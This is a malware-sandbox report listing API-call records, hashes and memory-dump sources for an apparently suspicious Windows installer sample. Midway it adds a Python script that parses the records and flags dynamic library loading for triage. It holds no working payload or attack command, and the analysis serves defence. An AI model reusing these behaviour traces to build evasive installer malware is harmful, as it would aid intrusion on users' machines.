• Opcode Fuzzy Hash: 8f2f68fe1260159639bfb28b43f5715fe2f8d879f7a621fd8f0c8717e3dae319
• Instruction Fuzzy Hash: A721DB71A04225ABCF207FA48E49B6E7670AB14358F20413BFB11B62D0CBBD4942966E
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(?,?,0042BC78,?,00405A02,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                                      • Part of subcall function 00405552: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405595
                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes, xrefs: 00401631
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes
• API String ID: 1892508949-1124679380
APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406090,80000002), ref: 00405E92
• RegCloseKey.ADVAPI32(?,?,00406090,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll), ref: 00405E9D
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: Call
• API String ID: 3356406503-1824292864
APIs
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 0040562D
• CloseHandle.KERNEL32(?), ref: 0040563A
Strings
• Error launching installer, xrefs: 00405617
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
APIs
  • Part of subcall function 00406268: FindFirstFileA.KERNELBASE(761F3410,0042C0C0,0042BC78,00405A2E,0042BC78,0042BC78,00000000,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\), ref: 00406273
  • Part of subcall function 00406268: FindClose.KERNELBASE(00000000), ref: 0040627F
• lstrlenA.KERNEL32 ref: 00402285
• lstrlenA.KERNEL32(00000000), ref: 0040228F
• SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004022B7
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: FileFindlstrlen$CloseFirstOperation
• String ID:
• API String ID: 1486964399-0
APIs
• RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402511
• RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402524
• RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000000,00000011,00000002), ref: 0040253C
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: Enum$CloseValue
• String ID:
• API String ID: 397863658-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
APIs
• RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040249D
• RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000000,00000011,00000002), ref: 0040253C
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3356406503-0
                                                                                                                                                                                    • Opcode ID: 2eaecf5d1f25b3e9b3db91f8049c91aae304fb395841604b111722c4aac40b40
                                                                                                                                                                                    • Instruction ID: 63e30908c11e451fd6d37fbe2862c18829a27713504d584fb03aa75526d5f0f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2eaecf5d1f25b3e9b3db91f8049c91aae304fb395841604b111722c4aac40b40
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D110471A00205EECB14CF64DA889AF7AB4DF04304F20403FE446B72C0D6B88A42DB29
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
• Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
• Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
• Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
APIs
• RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040239C
• RegCloseKey.ADVAPI32(00000000), ref: 004023A5
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: CloseDeleteValue
• String ID:
• API String ID: 2831762973-0
• Opcode ID: 2d182bd5bb81964bf3d6c73abe0e5da04b16bc02b1ff3d310bbf2a1c0b54d073
• Instruction ID: 9f7344dbbbe295334ba4b59a8a7f158e9db2909d035d2b37875cf389d282e7c6
• Opcode Fuzzy Hash: 2d182bd5bb81964bf3d6c73abe0e5da04b16bc02b1ff3d310bbf2a1c0b54d073
• Instruction Fuzzy Hash: D3F09632B04111ABD710BFB89B8EABE76A89B40354F25003FEA05B71C1D9FC4D02476D
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401E43
• EnableWindow.USER32(00000000,00000000), ref: 00401E4E
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
• Opcode ID: a14bac78f0f093d0819e34cdb63e8fe71bbe50b719fbc7a327d4eb1dfebe48e0
• Instruction ID: 3dc443410be61cb95396677418e376cd67e931bc8a1c74ede8e95758ff339cf3
• Opcode Fuzzy Hash: a14bac78f0f093d0819e34cdb63e8fe71bbe50b719fbc7a327d4eb1dfebe48e0
• Instruction Fuzzy Hash: B3E01272B082129FD714EBB6AA495AE77B4EB40325B10403BE415F11D1DE7888419F5D
APIs
• GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
• GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
  • Part of subcall function 0040628F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
  • Part of subcall function 0040628F: wsprintfA.USER32 ref: 004062DF
  • Part of subcall function 0040628F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
• Instruction ID: 0a5867ae11c12db0e7684f2d0d3995392d51af775f5f68958dac655171f1c28e
• Opcode Fuzzy Hash: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
• Instruction Fuzzy Hash: 83E08C32604221ABD210AB749E0493B63A8EF98740306483EF94AF2240DB3C9C7296A9
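The record above is the one in this stretch of the listing that deserves a second look: imports are resolved at run time through GetProcAddress, and the library is brought in by a helper (subcall 0040628F) that builds a path from GetSystemDirectoryA and wsprintfA and then calls LoadLibraryExA with dwFlags 0x00000008, which is LOAD_WITH_ALTERED_SEARCH_PATH. Whether that is a benign installer stub pinning its helper DLL to the system directory or something worse cannot be decided from one record; what helps is extracting these facts from the thousands of records in the report mechanically. The Python script below is an added example and is not part of the Joe Sandbox report or its IDA plugin. It parses records in the listing's layout (the two embedded records are copied from this page, with the leading whitespace dropped), counts which DLLs the functions import from, decodes the LoadLibraryExA flag word, and flags every function that combines GetProcAddress with a LoadLibraryExA subcall. The flag table is a subset of the documented Win32 LoadLibraryEx values; splitting records at the "APIs" header is an assumption about the report layout.

```python
import re
from collections import Counter

# Constructed sample: two function records copied from this report's IDA-plugin
# listing with leading whitespace removed. A real report holds thousands.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
• GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
  • Part of subcall function 0040628F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
  • Part of subcall function 0040628F: wsprintfA.USER32 ref: 004062DF
  • Part of subcall function 0040628F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• Opcode ID: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
• Opcode Fuzzy Hash: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
APIs
• RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040239C
• RegCloseKey.ADVAPI32(00000000), ref: 004023A5
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseDeleteValue
• Opcode ID: 2d182bd5bb81964bf3d6c73abe0e5da04b16bc02b1ff3d310bbf2a1c0b54d073
• Opcode Fuzzy Hash: 2d182bd5bb81964bf3d6c73abe0e5da04b16bc02b1ff3d310bbf2a1c0b54d073
"""

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional (args) and a ", ref: ADDR" tail. wsprintfA has neither args nor comma.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")

# Subset of the documented LoadLibraryEx dwFlags values (Win32 SDK headers).
LOAD_LIBRARY_FLAGS = {
    0x0001: "DONT_RESOLVE_DLL_REFERENCES",
    0x0002: "LOAD_LIBRARY_AS_DATAFILE",
    0x0008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x0200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x0800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}


def parse_records(text):
    """Split the listing at each 'APIs' header (assumed record boundary) and
    return one {'apis': [...], 'fields': {...}} dict per function record."""
    records = []
    for chunk in text.split("APIs\n")[1:]:
        rec = {"apis": [], "fields": {}}
        for line in chunk.splitlines():
            m = API_RE.match(line)
            if m:
                args = m.group("args")
                rec["apis"].append({
                    "name": m.group("name"),
                    "module": m.group("module"),
                    "args": args.split(",") if args else [],
                    "ref": m.group("ref").upper(),
                    "subcall": m.group("sub"),   # None when called directly
                })
                continue
            f = FIELD_RE.match(line)
            if f:
                rec["fields"][f.group("key").strip()] = f.group("value").strip()
        records.append(rec)
    return records


def module_histogram(records):
    """Count the DLLs the listed functions import from, subcalls included."""
    return Counter(a["module"] for r in records for a in r["apis"])


def decode_flags(value, table=LOAD_LIBRARY_FLAGS):
    """Expand a flag word into symbolic names; unknown bits are kept as hex."""
    names = [n for bit, n in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return names


def find_dynamic_resolution(records):
    """Return (GetProcAddress ref, LoadLibraryExA flag names) for each function
    that resolves imports at run time through a LoadLibraryExA subcall. A '?'
    in the flags slot means the sandbox could not recover the value."""
    hits = []
    for r in records:
        by_name = {a["name"]: a for a in r["apis"]}
        if "GetProcAddress" in by_name and "LoadLibraryExA" in by_name:
            args = by_name["LoadLibraryExA"]["args"]
            flags = int(args[2], 16) if len(args) >= 3 and args[2] != "?" else 0
            hits.append((by_name["GetProcAddress"]["ref"], decode_flags(flags)))
    return hits


def hashes_consistent(record):
    """In this report every record's Opcode ID equals its Opcode Fuzzy Hash;
    return False for a record where the two 64-hex-digit values diverge."""
    f = record["fields"]
    return f.get("Opcode ID") == f.get("Opcode Fuzzy Hash")


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(module_histogram(recs))
    print(find_dynamic_resolution(recs))
```

Run against a full report saved as text, the module histogram separates the installer stub's ADVAPI32/USER32-heavy functions from whatever the unpacked payload resolves later, and `find_dynamic_resolution` gives the list of functions to open first in the disassembler.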
APIs
• GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 00405B02
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                    • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                                                                                                                                    • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,004031E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 004055D5
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055E3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                    • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                                                                                                                                    • Instruction ID: ff59ce228810ab0b399ea54ffc24e93d20618ce1ebfa51e1db99450e15aaec59
                                                                                                                                                                                    • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                                                                                                                                    • Instruction Fuzzy Hash: FAC08C30200101ABDB010B318F08B073A62AB80380F0288396042E00B4CA308004C92E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2111968516-0
                                                                                                                                                                                    • Opcode ID: e235dcb744ebcc946608d91797e9ef60a83683288e53699933f586765b830fd2
                                                                                                                                                                                    • Instruction ID: 7874e25a1fd417281295b021b6ee833f9e9a2ca8db09fa59ccc2d9f5114d9ff1
                                                                                                                                                                                    • Opcode Fuzzy Hash: e235dcb744ebcc946608d91797e9ef60a83683288e53699933f586765b830fd2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 33213B70D04299BECF318B689548AAEBF709F11304F14847FE4D0B62D1C5BE8A82CF19
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A0
                                                                                                                                                                                      • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
